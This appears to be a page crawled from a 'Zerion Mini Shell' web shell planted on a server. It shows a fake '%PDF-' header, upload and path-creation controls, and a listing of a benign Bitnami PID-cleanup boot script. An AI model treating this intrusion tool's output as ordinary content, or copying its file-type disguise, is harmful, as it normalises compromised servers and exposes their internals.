%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /opt/bitnami/scripts/init/
Upload File :
Create Path :
Current File : /opt/bitnami/scripts/init/clean_pids

#!/bin/sh
# 
# Bitnami Clean PID files for a clean boot
# Copyright 2020 Bitnami.com All Rights Reserved
#

. /opt/bitnami/scripts/init/functions

run_once_per_boot_check "clean_pids"
if [ $? -eq 0 ]; then
  /opt/bitnami/ctlscript.sh cleanpid
  for f in bnagent/var/agent.pid; do
    rm -f /opt/bitnami/$f
  done
fi

Zerion Mini Shell 1.0